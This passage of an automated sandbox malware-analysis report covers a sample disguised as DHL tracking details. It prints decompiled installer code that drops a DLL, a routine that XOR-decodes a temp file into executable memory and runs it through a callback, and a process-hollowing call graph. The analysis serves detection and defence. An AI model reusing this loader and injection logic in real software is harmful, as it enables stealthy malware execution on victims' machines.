                    					if(_t41 != 0xffffffff) {
                    						break;
                    					}
                    					__eflags =  *(_t85 + 8) - _t75;
                    					if( *(_t85 + 8) != _t75) {
                    						E00404E23(0xffffffe2,  *(_t85 - 8));
                    						__eflags =  *(_t85 + 8) - 2;
                    						if(__eflags == 0) {
                    							 *((intOrPtr*)(_t85 - 4)) = 1;
                    						}
                    						L31:
                    						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                    						__eflags =  *0x423f28;
                    						goto L32;
                    					} else {
                    						E00405A85(0x40a368, 0x424000);
                    						E00405A85(0x424000, 0x409b68);
                    						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\engineer\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll",  *((intOrPtr*)(_t85 - 0x10)));
                    						E00405A85(0x424000, 0x40a368);
                    						_t62 = E00405346("C:\Users\engineer\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll",  *(_t85 - 0x24) >> 3) - 4;
                    						__eflags = _t62;
                    						if(_t62 == 0) {
                    							continue;
                    						} else {
                    							__eflags = _t62 == 1;
                    							if(_t62 == 1) {
                    								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                    								L32:
                    								_t49 = 0;
                    								__eflags = 0;
                    							} else {
                    								_push(0x409b68);
                    								_push(0xfffffffa);
                    								E00404E23();
                    								L29:
                    								_t49 = 0x7fffffff;
                    							}
                    						}
                    					}
                    					L33:
                    					return _t49;
                    				}
                    				E00404E23(0xffffffea,  *(_t85 - 8));
                    				 *0x423f54 =  *0x423f54 + 1;
                    				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                    				 *0x423f54 =  *0x423f54 - 1;
                    				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                    				_t80 = _t43;
                    				if( *(_t85 - 0x18) != 0xffffffff) {
                    					L22:
                    					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                    				} else {
                    					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                    					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                    						goto L22;
                    					}
                    				}
                    				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                    				__eflags = _t80 - _t75;
                    				if(_t80 >= _t75) {
                    					goto L31;
                    				} else {
                    					__eflags = _t80 - 0xfffffffe;
                    					if(_t80 != 0xfffffffe) {
                    						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                    					} else {
                    						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                    						lstrcatA(0x409b68,  *(_t85 - 8));
                    					}
                    					_push(0x200010);
                    					_push(0x409b68);
                    					E00405346();
                    					goto L29;
                    				}
                    				goto L33;
                    			}

















                    APIs
                    • lstrcatA.KERNEL32(00000000,00000000,gdsanv,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                    • CompareFileTime.KERNEL32(-00000014,?,gdsanv,gdsanv,00000000,00000000,gdsanv,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                      • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,nkdpnsqeoocyepqnevm Setup,NSIS Error), ref: 00405A92
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp$C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll$gdsanv
                    • API String ID: 1941528284-3335788617
                    • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                    • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                    • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                    • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 385 23811bb-2381269 call 23806c7 call 2380776 * 7 402 238126c-2381270 385->402 403 2381288-2381295 402->403 404 2381272-2381286 402->404 405 2381298-238129c 403->405 404->402 406 238129e-23812b2 405->406 407 23812b4-23812d0 405->407 406->405 409 23812da-2381304 CreateProcessW 407->409 410 23812d2-23812d5 407->410 413 238130e-2381327 GetThreadContext 409->413 414 2381306-2381309 409->414 411 238147d-2381480 410->411 415 2381329-238132c 413->415 416 2381331-238134b ReadProcessMemory 413->416 414->411 415->411 417 238134d-2381350 416->417 418 2381355-238135e 416->418 417->411 419 2381388-23813a8 VirtualAllocEx 418->419 420 2381360-238136f 418->420 422 23813aa-23813ad 419->422 423 23813b2-23813ca call 2380267 419->423 420->419 421 2381371-2381377 call 2380368 420->421 426 238137c-238137e 421->426 422->411 429 23813cc-23813cf 423->429 430 23813d4-23813d8 423->430 426->419 428 2381380-2381383 426->428 428->411 429->411 431 23813e1-23813eb 430->431 432 23813ed-238141b call 2380267 431->432 433 2381422-238143e call 2380267 431->433 436 2381420 432->436 439 2381440-2381443 433->439 440 2381445-2381463 SetThreadContext 433->440 436->431 439->411 441 238146a-238146d call 23801b6 440->441 442 2381465-2381468 440->442 444 2381472-2381474 441->444 442->411 445 238147b 444->445 446 2381476-2381479 444->446 445->411 446->411
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 023812FF
                    • GetThreadContext.KERNELBASE(?,00010007), ref: 02381322
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ContextCreateProcessThread
                    • String ID: D
                    • API String ID: 2843130473-2746444292
                    • Opcode ID: d2456bc59d1b2e60673a28ec1d3b8f16685ec7ebdf11fcffbf0185f5de6b3b31
                    • Instruction ID: 5d7d434765d399b162032b945882c76d53c74a6255578f162c1e77fe997975f9
                    • Opcode Fuzzy Hash: d2456bc59d1b2e60673a28ec1d3b8f16685ec7ebdf11fcffbf0185f5de6b3b31
                    • Instruction Fuzzy Hash: E3A1F571E10209EFDF54EFA4C980BAEBBB9EF08345F1044A5E559EB250D771AA42CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 497 402f01-402f10 498 402f12-402f28 SetFilePointer 497->498 499 402f2e-402f39 call 40302c 497->499 498->499 502 403025-403029 499->502 503 402f3f-402f59 ReadFile 499->503 504 403022 503->504 505 402f5f-402f62 503->505 507 403024 504->507 505->504 506 402f68-402f7b call 40302c 505->506 506->502 510 402f81-402f84 506->510 507->502 511 402ff1-402ff7 510->511 512 402f86-402f89 510->512 513 402ff9 511->513 514 402ffc-40300f ReadFile 511->514 515 40301d-403020 512->515 516 402f8f 512->516 513->514 514->504 517 403011-40301a 514->517 515->502 518 402f94-402f9c 516->518 517->515 519 402fa1-402fb3 ReadFile 518->519 520 402f9e 518->520 519->504 521 402fb5-402fb8 519->521 520->519 521->504 522 402fba-402fcf WriteFile 521->522 523 402fd1-402fd4 522->523 524 402fed-402fef 522->524 523->524 525 402fd6-402fe9 523->525 524->507 525->518 526 402feb 525->526 526->515
                    C-Code - Quality: 93%
                    			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                    				long _v8;
                    				intOrPtr _v12;
                    				void _t31;
                    				intOrPtr _t32;
                    				int _t35;
                    				long _t36;
                    				int _t37;
                    				long _t38;
                    				int _t40;
                    				int _t42;
                    				long _t43;
                    				long _t44;
                    				intOrPtr _t51;
                    				long _t55;
                    				long _t57;
                    
                    				_t31 = _a4;
                    				if(_t31 >= 0) {
                    					_t51 =  *0x423ef8; // 0x7161
                    					_t44 = _t31 + _t51;
                    					 *0x41703c = _t44;
                    					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                    				}
                    				_t57 = 4;
                    				_t32 = E0040302C(_t57);
                    				if(_t32 >= 0) {
                    					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                    					if(_t35 == 0 || _v8 != _t57) {
                    						L23:
                    						_push(0xfffffffd);
                    						goto L24;
                    					} else {
                    						 *0x41703c =  *0x41703c + _t57;
                    						_t32 = E0040302C(_a4);
                    						_v12 = _t32;
                    						if(_t32 >= 0) {
                    							if(_a12 != 0) {
                    								_t36 = _a4;
                    								if(_t36 >= _a16) {
                    									_t36 = _a16;
                    								}
                    								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                    								if(_t37 == 0) {
                    									goto L23;
                    								} else {
                    									_t38 = _v8;
                    									 *0x41703c =  *0x41703c + _t38;
                    									_v12 = _t38;
                    									goto L22;
                    								}
                    							} else {
                    								if(_a4 <= 0) {
                    									L22:
                    									_t32 = _v12;
                    								} else {
                    									while(1) {
                    										_t55 = 0x4000;
                    										if(_a4 < 0x4000) {
                    											_t55 = _a4;
                    										}
                    										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                    										if(_t40 == 0 || _t55 != _v8) {
                    											goto L23;
                    										}
                    										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                    										if(_t42 == 0 || _a16 != _t55) {
                    											_push(0xfffffffe);
                    											L24:
                    											_pop(_t32);
                    										} else {
                    											_t43 = _v8;
                    											_v12 = _v12 + _t43;
                    											_a4 = _a4 - _t43;
                    											 *0x41703c =  *0x41703c + _t43;
                    											if(_a4 > 0) {
                    												continue;
                    											} else {
                    												goto L22;
                    											}
                    										}
                    										goto L25;
                    									}
                    									goto L23;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				L25:
                    				return _t32;
                    			}

                    APIs
                    • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                    • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                    • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FAF
                    • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$Read$PointerWrite
                    • String ID: 80A
                    • API String ID: 2113905535-195308239
                    • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                    • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                    • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                    • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E735F1000(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                    				short _v6;
                    				short _v8;
                    				short _v10;
                    				short _v12;
                    				short _v14;
                    				short _v16;
                    				short _v18;
                    				short _v20;
                    				short _v22;
                    				char _v24;
                    				long _v28;
                    				short _v1068;
                    				short _t18;
                    				short _t19;
                    				short _t20;
                    				short _t21;
                    				short _t22;
                    				short _t23;
                    				short _t24;
                    				short _t25;
                    				short _t26;
                    				void* _t34;
                    				_Unknown_base(*)()* _t36;
                    				long _t46;
                    				void* _t53;
                    				_Unknown_base(*)()* _t57;
                    				void* _t59;
                    
                    				_t18 = 0x79;
                    				_v24 = _t18;
                    				_t19 = 0x62;
                    				_v22 = _t19;
                    				_t20 = 0x6c;
                    				_v20 = _t20;
                    				_t21 = 0x68;
                    				_v18 = _t21;
                    				_t22 = 0x63;
                    				_v16 = _t22;
                    				_t23 = 0x69;
                    				_v14 = _t23;
                    				_t24 = 0x75;
                    				_v12 = _t24;
                    				_t25 = 0x77;
                    				_v10 = _t25;
                    				_t26 = 0x7a;
                    				_v8 = _t26;
                    				_v6 = 0;
                    				GetTempPathW(0x103,  &_v1068);
                    				E735F473E( &_v1068,  &_v24);
                    				_t34 = CreateFileW( &_v1068, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                    				_t59 = _t34;
                    				_t46 = GetFileSize(_t59, 0);
                    				_t36 = VirtualAlloc(0, _t46, 0x3000, 0x40); // executed
                    				_t57 = _t36;
                    				ReadFile(_t59, _t57, _t46,  &_v28, 0); // executed
                    				_t53 = 0;
                    				if(_t46 != 0) {
                    					do {
                    						 *(_t53 + _t57) = ( *(_t53 + _t57) ^ 0x00000088) + 0x21;
                    						_t53 = _t53 + 1;
                    					} while (_t53 < _t46);
                    				}
                    				EnumResourceTypesW(0, _t57, 0); // executed
                    				return 0x1046a;
                    			}

                    APIs
                    • GetTempPathW.KERNEL32(00000103,?), ref: 735F105D
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 735F108E
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 735F1098
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 735F10A9
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 735F10BA
                    • EnumResourceTypesW.KERNEL32 ref: 735F10DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.362749044.00000000735F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 735F0000, based on PE: true
                    • Associated: 00000000.00000002.362734839.00000000735F0000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000000.00000002.362766229.00000000735F5000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_735f0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
                    • String ID:
                    • API String ID: 3718768629-0
                    • Opcode ID: c94430efe445602d0bb9514fba7a23814980fa704528323e23870d015669e0c6
                    • Instruction ID: 8ae590dc03af96c38924be4cabdfd078ab64537de51d49bd537996730798e134
                    • Opcode Fuzzy Hash: c94430efe445602d0bb9514fba7a23814980fa704528323e23870d015669e0c6
                    • Instruction Fuzzy Hash: F021CE76A44349BBF7209AE19C55FBF377CEF45B10F20001AF604EB180D9A55A828369
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 532 40302c-403055 GetTickCount 533 403196-40319e call 402bc5 532->533 534 40305b-403086 call 4031da SetFilePointer 532->534 539 4031a0-4031a5 533->539 540 40308b-40309d 534->540 541 4030a1-4030af call 4031a8 540->541 542 40309f 540->542 545 4030b5-4030c1 541->545 546 403188-40318b 541->546 542->541 547 4030c7-4030cd 545->547 546->539 548 4030f8-403114 call 405e9d 547->548 549 4030cf-4030d5 547->549 555 403191 548->555 556 403116-40311e 548->556 549->548 551 4030d7-4030f7 call 402bc5 549->551 551->548 557 403193-403194 555->557 558 403120-403136 WriteFile 556->558 559 403152-403158 556->559 557->539 560 403138-40313c 558->560 561 40318d-40318f 558->561 559->555 562 40315a-40315c 559->562 560->561 563 40313e-40314a 560->563 561->557 562->555 564 40315e-403171 562->564 563->547 565 403150 563->565 564->540 566 403177-403186 SetFilePointer 564->566 565->564 566->533
                    C-Code - Quality: 94%
                    			E0040302C(intOrPtr _a4) {
                    				long _v4;
                    				void* __ecx;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				signed int _t14;
                    				void* _t16;
                    				void* _t17;
                    				long _t18;
                    				int _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t34;
                    				long _t35;
                    				intOrPtr _t37;
                    				void* _t39;
                    				long _t40;
                    				intOrPtr _t46;
                    				intOrPtr _t47;
                    				intOrPtr _t53;
                    
                    				_t35 =  *0x41703c; // 0x41a9c
                    				_t37 = _t35 -  *0x40afa8 + _a4;
                    				 *0x423eac = GetTickCount() + 0x1f4;
                    				if(_t37 <= 0) {
                    					L23:
                    					E00402BC5(1);
                    					return 0;
                    				}
                    				E004031DA( *0x41f04c);
                    				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                    				 *0x41f048 = _t37;
                    				 *0x417038 = 0;
                    				while(1) {
                    					L2:
                    					_t12 =  *0x417040; // 0x3e104
                    					_t34 = 0x4000;
                    					_t13 = _t12 -  *0x41f04c;
                    					if(_t13 <= 0x4000) {
                    						_t34 = _t13;
                    					}
                    					_t14 = E004031A8(0x413038, _t34); // executed
                    					if(_t14 == 0) {
                    						break;
                    					}
                    					 *0x41f04c =  *0x41f04c + _t34;
                    					 *0x40afc8 = 0x413038;
                    					 *0x40afcc = _t34;
                    					while(1) {
                    						_t46 =  *0x423eb0; // 0x50f930
                    						if(_t46 != 0) {
                    							_t47 =  *0x423f40; // 0x0
                    							if(_t47 == 0) {
                    								_t22 =  *0x41f048; // 0x4081
                    								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                    								E00402BC5(0);
                    							}
                    						}
                    						 *0x40afd0 = 0x40b038;
                    						 *0x40afd4 = 0x8000; // executed
                    						_t16 = E00405E9D(0x40afb0); // executed
                    						if(_t16 < 0) {
                    							break;
                    						}
                    						_t39 =  *0x40afd0; // 0x40f0b9
                    						_t40 = _t39 - 0x40b038;
                    						if(_t40 == 0) {
                    							__eflags =  *0x40afcc; // 0x0
                    							if(__eflags != 0) {
                    								break;
                    							}
                    							__eflags = _t34;
                    							if(_t34 == 0) {
                    								break;
                    							}
                    							L17:
                    							_t18 =  *0x41703c; // 0x41a9c
                    							if(_t18 -  *0x40afa8 + _a4 > 0) {
                    								goto L2;
                    							}
                    							SetFilePointer( *0x409014, _t18, 0, 0); // executed
                    							goto L23;
                    						}
                    						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                    						if(_t21 == 0 || _t40 != _v4) {
                    							_push(0xfffffffe);
                    							L22:
                    							_pop(_t17);
                    							return _t17;
                    						} else {
                    							 *0x40afa8 =  *0x40afa8 + _t40;
                    							_t53 =  *0x40afcc; // 0x0
                    							if(_t53 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    					}
                    					_push(0xfffffffd);
                    					goto L22;
                    				}
                    				return _t14 | 0xffffffff;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 00403041
                      • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                    • WriteFile.KERNELBASE(0040B038,0040F0B9,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                    • SetFilePointer.KERNELBASE(00041A9C,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$Pointer$CountTickWrite
                    • String ID: 80A
                    • API String ID: 2146148272-195308239
                    • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                    • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                    • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                    • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 567 401f51-401f5d 568 401f63-401f79 call 4029e8 * 2 567->568 569 40200b-40200d 567->569 579 401f88-401f96 LoadLibraryExA 568->579 580 401f7b-401f86 GetModuleHandleA 568->580 571 402156-40215b call 401423 569->571 577 40287d-40288c 571->577 582 401f98-401fa6 GetProcAddress 579->582 583 402004-402006 579->583 580->579 580->582 584 401fe5-401fea call 404e23 582->584 585 401fa8-401fae 582->585 583->571 589 401fef-401ff2 584->589 587 401fb0-401fbc call 401423 585->587 588 401fc7-401fde call 735f1000 585->588 587->589 595 401fbe-401fc5 587->595 591 401fe0-401fe3 588->591 589->577 592 401ff8-401fff FreeLibrary 589->592 591->589 592->577 595->589
                    C-Code - Quality: 57%
                    			E00401F51(void* __ebx, void* __eflags) {
                    				struct HINSTANCE__* _t18;
                    				struct HINSTANCE__* _t25;
                    				void* _t26;
                    				struct HINSTANCE__* _t29;
                    				CHAR* _t31;
                    				intOrPtr* _t32;
                    				void* _t33;
                    
                    				_t26 = __ebx;
                    				asm("sbb eax, 0x423f58");
                    				 *(_t33 - 4) = 1;
                    				if(__eflags < 0) {
                    					_push(0xffffffe7);
                    					L14:
                    					E00401423();
                    					L15:
                    					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                    					return 0;
                    				}
                    				_t31 = E004029E8(0xfffffff0);
                    				 *(_t33 + 8) = E004029E8(1);
                    				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                    					L3:
                    					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                    					_t29 = _t18;
                    					if(_t29 == _t26) {
                    						_push(0xfffffff6);
                    						goto L14;
                    					}
                    					L4:
                    					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                    					if(_t32 == _t26) {
                    						E00404E23(0xfffffff7,  *(_t33 + 8));
                    					} else {
                    						 *(_t33 - 4) = _t26;
                    						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                    							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                    						} else {
                    							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                    							if( *_t32() != 0) {
                    								 *(_t33 - 4) = 1;
                    							}
                    						}
                    					}
                    					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                    						FreeLibrary(_t29);
                    					}
                    					goto L15;
                    				}
                    				_t25 = GetModuleHandleA(_t31); // executed
                    				_t29 = _t25;
                    				if(_t29 != __ebx) {
                    					goto L4;
                    				}
                    				goto L3;
                    			}











                    APIs
                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                    • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                    • String ID: ?B
                    • API String ID: 2987980305-117478770
                    • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                    • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                    • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                    • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 597 4015b3-4015c6 call 4029e8 call 40560c 602 4015c8-4015e3 call 4055a3 CreateDirectoryA 597->602 603 40160a-40160d 597->603 610 401600-401608 602->610 611 4015e5-4015f0 GetLastError 602->611 605 40162d-40215b call 401423 603->605 606 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 603->606 619 40287d-40288c 605->619 606->619 610->602 610->603 614 4015f2-4015fb GetFileAttributesA 611->614 615 4015fd 611->615 614->610 614->615 615->610
                    C-Code - Quality: 85%
                    			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                    				struct _SECURITY_ATTRIBUTES** _t10;
